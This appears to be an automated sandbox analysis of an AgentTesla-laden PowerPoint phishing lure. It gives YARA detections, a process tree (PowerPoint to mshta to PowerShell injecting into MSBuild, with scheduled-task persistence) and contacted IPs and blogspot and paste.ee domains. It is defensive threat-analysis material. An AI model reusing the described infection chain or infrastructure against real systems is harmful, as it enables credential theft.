Source: Yara match File source: 00000018.00000002.2361625874.000000000461E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.2353771380.00000000045FE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.2295286876.00000000026F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 2816, type: MEMORY
Source: Yara match File source: 29.2.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
Yara detected Credential Stealer
Source: Yara match File source: 0000001D.00000002.2295286876.00000000026F1000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected AgentTesla
Source: Yara match File source: 0000000C.00000002.2279587829.00000000046AE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2281127990.00000000048E4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.2354098697.0000000004834000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.2291584431.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2370323670.0000000004854000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2361625874.000000000461E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.2353771380.00000000045FE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.2295286876.00000000026F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 2816, type: MEMORY
Source: Yara match File source: 29.2.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
Behavior Graph ID: 339086 Sample: BankSwiftCopyUSD95000.ppt Startdate: 13/01/2021 Architecture: WINDOWS Score: 100

Root signatures: Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; Yara detected AgentTesla; 15 other signatures
Root DNS/IP: www.blogger.com, startthepartyup.blogspot.com, 4 other IPs or domains

Process tree (parent -> child, as rendered in the graph):
  cmd.exe
    POWERPNT.EXE  [Document exploit detected (process start blacklist hit)]
      mshta.exe  [j.mp 67.199.248.16:80 GOOGLE-PRIVATE-CLOUDUS; blogspot.l.googleusercontent.com 108.177.127.132:443 GOOGLEUS; 3 other IPs or domains]
                 [Creates autostart registry keys with suspicious values (likely registry only malware); Creates multiple autostart registry keys; Creates an autostart registry key pointing to binary in C:\Windows; Creates a scheduled task launching mshta.exe (likely to bypass HIPS)]
        powershell.exe  [paste.ee 104.18.49.20:443 CLOUDFLARENETUS] [Writes to foreign memory regions; Injects a PE file into a foreign processes]
          MSBuild.exe  [64.188.18.218 ASN-QUADRANET-GLOBALUS] [Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter); Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard)]
        cmd.exe
          taskkill.exe
          taskkill.exe
        schtasks.exe
      PING.EXE  [Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter); Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard)]
      PING.EXE
  taskeng.exe
    mshta.exe
      mshta.exe  [www.blogger.com; randikhanaekminar.blogspot.com]
        powershell.exe
  mshta.exe
    mshta.exe  [www.blogger.com; 2 other IPs or domains]
      powershell.exe  [172.67.219.133:443 CLOUDFLARENETUS; paste.ee] [Injects a PE file into a foreign processes]
  4 other processes
    powershell.exe  [paste.ee]
    mshta.exe  [www.blogger.com; 2 other IPs or domains]
    mshta.exe  [www.blogger.com; 2 other IPs or domains]

Contacted Public IPs

IP              | Domain  | Country       | ASN    | ASN Name                  | Malicious
108.177.127.132 | unknown | United States | 15169  | GOOGLEUS                  | false
172.67.219.133  | unknown | United States | 13335  | CLOUDFLARENETUS           | false
67.199.248.16   | unknown | United States | 396982 | GOOGLE-PRIVATE-CLOUDUS    | true
104.18.49.20    | unknown | United States | 13335  | CLOUDFLARENETUS           | false
64.188.18.218   | unknown | United States | 8100   | ASN-QUADRANET-GLOBALUS    | false

Contacted Domains

Name                              | IP              | Active
paste.ee                          | 104.18.49.20    | true
blogspot.l.googleusercontent.com  | 108.177.127.132 | true
j.mp                              | 67.199.248.16   | true
ghostbackbone123.blogspot.com     | unknown         | unknown
startthepartyup.blogspot.com      | unknown         | unknown
backbones1234511a.blogspot.com    | unknown         | unknown
mainjigijigi123.blogspot.com      | unknown         | unknown
randikhanaekminar.blogspot.com    | unknown         | unknown
www.blogger.com                   | unknown         | unknown
resources.blogblog.com            | unknown         | unknown